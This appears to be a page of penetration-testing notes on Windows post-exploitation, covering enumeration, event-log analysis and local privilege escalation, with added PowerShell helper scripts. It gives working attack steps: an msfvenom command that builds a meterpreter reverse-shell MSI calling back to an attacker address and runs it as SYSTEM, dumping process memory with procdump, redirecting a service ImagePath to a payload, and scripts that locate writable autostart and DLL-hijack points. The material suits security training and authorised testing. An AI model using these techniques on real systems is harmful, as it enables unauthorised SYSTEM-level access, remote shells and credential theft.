akde/infosec

Information security is ultimately about managing risk


Various

Show who else is logged in.

qwinsta

Open the Event Viewer and search through the logs. Have fun!

Network enumeration

Show the network configuration. Are there multiple interfaces?

ipconfig /all

Routing information

route print

Show current network connections and listening ports together with the owning PID. After running this command, compare the listening ports with the ones found earlier from the outside: ports that only show up locally are either bound to localhost or filtered by the host firewall, and both are worth a closer look.

netstat -ano
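An added example (not from the original page) that does this comparison in PowerShell: it lists the listening TCP sockets with their owning process and diffs them against the ports seen from the outside. The external port list is a constructed sample; replace it with the result of your scan. Get-NetTCPConnection needs the NetTCPIP module (Windows 8 / Server 2012 and later); on older systems parse netstat -ano instead.

```powershell
# Added example, not code from the original page: compare locally listening TCP
# ports against the ports an external scan showed. Ports seen only locally are
# either bound to a loopback address or filtered by the host firewall; ports seen
# only externally mean the scan hit something other than this host (NAT, proxy).

# Constructed sample: ports found from the outside, e.g. by an nmap scan (assumption).
$externalPorts = @(21, 80, 445, 3389)

# Listening TCP sockets as netstat -ano would show them, with the owning process.
$listening = Get-NetTCPConnection -State Listen |
    ForEach-Object {
        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        [pscustomobject]@{
            LocalAddress = $_.LocalAddress
            Port         = $_.LocalPort
            PID          = $_.OwningProcess
            Process      = if ($proc) { $proc.ProcessName } else { '?' }
        }
    }

$localPorts = $listening.Port | Sort-Object -Unique

$onlyLocal    = $localPorts    | Where-Object { $_ -notin $externalPorts }
$onlyExternal = $externalPorts | Where-Object { $_ -notin $localPorts }

"Listening locally but not seen from outside (loopback-bound or filtered):"
$listening | Where-Object { $_.Port -in $onlyLocal } | Format-Table -AutoSize

"Seen from outside but not listening here (not this host, NAT, proxy):"
$onlyExternal
```

Every port in the first list deserves a look at LocalAddress: a 127.0.0.1 binding means a service that is only reachable via port forwarding, a 0.0.0.0 binding that is invisible from outside means the firewall is filtering it.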

Check the ARP cache for other communication partners:

arp -a

Processes and services

If there are interesting services, refer to the services post.

Dump memory

  1. Get the full process name with
    tasklist | findstr /C:ftp
  2. Upload procdump[64].exe (Sysinternals)
  3. Dump the process memory (-ma writes a full dump) with
    procdump64.exe -accepteula -ma ftp.exe
  4. Download the generated .dmp file

Dumping a process that runs under another account needs administrative rights (SeDebugPrivilege); as a normal user only your own processes can be dumped.

Windows Event Logging

Events are stored as .evtx files in the %SystemRoot%\System32\winevt\Logs directory.

The tool Hayabusa is a parser for analysing larger .evtx files.

The built-in command-line tool wevtutil gives access to the logging system; in PowerShell, Get-WinEvent does the same with filtering. (More examples: see Incident Response Training March 2025)

List logs:

wevtutil el

Search for a specific log (in PowerShell; in cmd use findstr instead of select-string):

wevtutil el | select-string security
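An added example (not from the original page) for the PowerShell side: it pulls successful logons (event ID 4624) from the Security log with Get-WinEvent and summarises who logged on from where and how. Reading the Security log needs administrative rights or membership in Event Log Readers; the 24-hour window is an assumption.

```powershell
# Added example, not code from the original page: summarise logon events from the
# Security log. Event ID 4624 = successful logon. Logon types of interest:
#   2 interactive, 3 network, 10 RemoteInteractive (RDP)
$filter = @{
    LogName   = 'Security'
    Id        = 4624
    StartTime = (Get-Date).AddDays(-1)   # last 24 hours (assumption, adjust as needed)
}

Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
    ForEach-Object {
        # Named EventData fields are easiest to read from the XML form of the event.
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time      = $_.TimeCreated
            User      = "$($data.TargetDomainName)\$($data.TargetUserName)"
            LogonType = $data.LogonType
            Source    = $data.IpAddress
            Process   = $data.ProcessName
        }
    } |
    # Drop the noisy machine-account and SYSTEM logons.
    Where-Object { $_.User -notmatch '\$$' -and $_.User -notmatch 'SYSTEM$' } |
    Group-Object User, LogonType, Source |
    Sort-Object Count -Descending |
    Format-Table Count, Name -AutoSize

# Offline analysis of an exported .evtx file works the same way:
# Get-WinEvent -FilterHashtable @{ Path = 'C:\Temp\Security.evtx'; Id = 4624 }
```

Type 10 logons from unexpected source addresses and type 3 logons with a high count for one account are the usual first hits when looking for lateral movement.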

Registry

See Win­dows Reg­istry post

Autoelevated

Check whether the AlwaysInstallElevated policy is active for Windows Installer. The value has to be 1 under HKLM and also under the same path in HKCU; with only one of them set, msiexec does not install with SYSTEM rights:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

If both values are set to 1:

  1. Create and upload the payload:
    msfvenom -p windows/meterpreter/reverse_tcp lhost=$attackerip lport=4444 -f msi -o setup.msi
  2. Execute it (the MSI is installed as SYSTEM, so the payload runs with SYSTEM rights):
    msiexec /quiet /qn /i C:\Temp\setup.msi

Alternative: in an existing session, use the Metasploit module exploit/windows/local/always_install_elevated.
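An added example (not from the original page) that checks both hives at once, since the HKCU half is the one that is usually forgotten. The MSI path in the comment is an assumption and refers to the setup.msi from the msfvenom step above.

```powershell
# Added example, not code from the original page: AlwaysInstallElevated is only
# exploitable when BOTH the machine and the user policy value are 1.
function Test-AlwaysInstallElevated {
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $result = foreach ($key in $keys) {
        # A missing key or value counts as 0 (policy not set).
        $val = (Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{ Key = $key; AlwaysInstallElevated = [int]($val -eq 1) }
    }
    $result | Format-Table -AutoSize | Out-String | Write-Host
    return -not ($result.AlwaysInstallElevated -contains 0)
}

if (Test-AlwaysInstallElevated) {
    'Both values are 1: an MSI package installed with msiexec runs as SYSTEM.'
    # Path of the uploaded package is an assumption (the setup.msi built with msfvenom above):
    # msiexec /quiet /qn /i C:\Temp\setup.msi
} else {
    'Policy not set in both hives: not exploitable this way.'
}
```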

Registry service escalation

Check in a PowerShell session which groups have access to the registry key of the service:

Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

Check whether the current user is in a group (whoami /groups) that is listed under Access with FullControl (SetValue alone is enough to change ImagePath). If yes:

  1. Create an exe payload from the service template windows_service.c and upload it. The Service Control Manager kills a binary that does not report back as a service after roughly 30 seconds, so the payload has to finish its work within that time, e.g. elevate the current user, create a new one, or place a file somewhere.
  2. Register the file as the service binary:
    reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\s64.exe /f
  3. Start the service
    sc start regsvc
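An added example (not from the original page) that generalises the Get-Acl check above to every service key: it collects the identities in the current token (the output of whoami /groups) and reports each service whose key grants one of them a right that lets us change ImagePath. The rights considered are SetValue plus ChangePermissions/TakeOwnership, which would let us grant SetValue to ourselves; FullControl contains all of them.

```powershell
# Added example, not code from the original page: find service registry keys whose
# ACL lets the current user (or one of its groups) redirect ImagePath.

# Identities in the current token: the user plus all group names (whoami /groups).
$id      = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$myNames = @($id.Name) + @(foreach ($g in $id.Groups) {
    try { $g.Translate([System.Security.Principal.NTAccount]).Value } catch { $g.Value }
})

# Any of these bits is enough; FullControl includes all of them.
$writeBits = [System.Security.AccessControl.RegistryRights]'SetValue, ChangePermissions, TakeOwnership'

Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $key = $_
        try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { return }
        $hits = $acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.IdentityReference.Value -in $myNames -and
            (($_.RegistryRights -band $writeBits) -ne 0)
        }
        if ($hits) {
            [pscustomobject]@{
                Service   = $key.PSChildName
                ImagePath = (Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue).ImagePath
                Identity  = ($hits.IdentityReference.Value | Sort-Object -Unique) -join ', '
                Rights    = ($hits.RegistryRights | Sort-Object -Unique) -join ', '
            }
        }
    } | Format-Table -AutoSize
```

A hit is only useful if the service can also be started (sc start needs start permission on the service object itself, check with sc sdshow) or if it starts automatically at boot and we can trigger a reboot.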

Autostart/Autorun exploitations

Check if the user has write access to the autostart directory:

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

If the output for the current user or one of its groups contains F (full access), M (modify) or W (write), copy an exe payload into the directory. It is executed at the next logon of any user, with that user's privileges, so the payload only gains something once an admin logs in.

Alternative: check the registry for autostart programs and check write access to their executables and directories as above.

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

DLL exploitation

Check whether a process tries to load a DLL that we can replace, or searches several paths for it so that we can create a DLL in a directory earlier in the search order than the one where it is normally found. If yes, use windows_dll.c to create the DLL. (Use PowerUp to determine the location.)
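An added example (not from the original page) that serves both the autostart and the DLL section with one file-system ACL helper: it reports whether the startup folders and the executables behind the Run/RunOnce entries are writable for us, and then walks the default DLL search order for a given DLL name to show which directories we could plant it in before the loader reaches the copy it normally finds. The DLL name and the application directory are assumptions; take them from Process Monitor or PowerUp output.

```powershell
# Added example, not code from the original page. One ACL helper for both checks:
# (1) writable startup folders / Run-key targets, (2) writable directories earlier
# in the DLL search order than the directory where the DLL is actually found.

$id      = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$myNames = @($id.Name) + @(foreach ($g in $id.Groups) {
    try { $g.Translate([System.Security.Principal.NTAccount]).Value } catch { $g.Value }
})
# Any of these bits lets us create or replace a file there (FullControl, Modify and
# Write all contain WriteData/AppendData, so icacls' F, M and W are all covered).
$writeBits = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, ChangePermissions, TakeOwnership'

function Test-Writable([string]$Path) {
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    [bool]($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference.Value -in $myNames -and
        (($_.FileSystemRights -band $writeBits) -ne 0)
    })
}

# --- Autostart: startup folders and Run/RunOnce entries ---
$startupDirs = "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup",
               "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
$runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
           'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'

foreach ($dir in $startupDirs) { '{0,-6} {1}' -f (Test-Writable $dir), $dir }
foreach ($key in $runKeys) {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($name in ($props.PSObject.Properties.Name | Where-Object { $_ -notlike 'PS*' })) {
        # Executable = the quoted first token, otherwise the first whitespace-separated token.
        $value = [string]$props.$name
        $exe = if ($value -match '^"([^"]+)"') { $Matches[1] } else { ($value -split '\s+')[0] }
        '{0,-6} {1}  ({2}\{3})' -f (Test-Writable $exe), $exe, $key, $name
        $parent = Split-Path -Path $exe -Parent
        if ($parent) { '{0,-6} {1}  (directory)' -f (Test-Writable $parent), $parent }
    }
}

# --- DLL hijack: walk the default search order for a DLL name ---
# Name and application directory are assumptions (from Process Monitor / PowerUp).
# With SafeDllSearchMode disabled, the current directory moves up to second place.
$dllName = 'missing.dll'
$appDir  = 'C:\Program Files\VulnApp'
$searchOrder = @($appDir, "$env:SystemRoot\System32", "$env:SystemRoot\System", $env:SystemRoot, (Get-Location).Path) +
               @($env:Path -split ';' | Where-Object { $_ })
foreach ($dir in $searchOrder) {
    $found = Test-Path -LiteralPath (Join-Path $dir $dllName)
    '{0,-6} {1,-6} {2}' -f (Test-Writable $dir), $found, $dir
    if ($found) { break }   # the loader stops at the first hit; only writable dirs above this line matter
}
```

A True in the first column of a line above the line where the DLL was found is a hijack point; if the DLL is found nowhere, every writable directory in the list works. Note that DLLs listed under KnownDLLs are always taken from System32 and cannot be hijacked this way.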
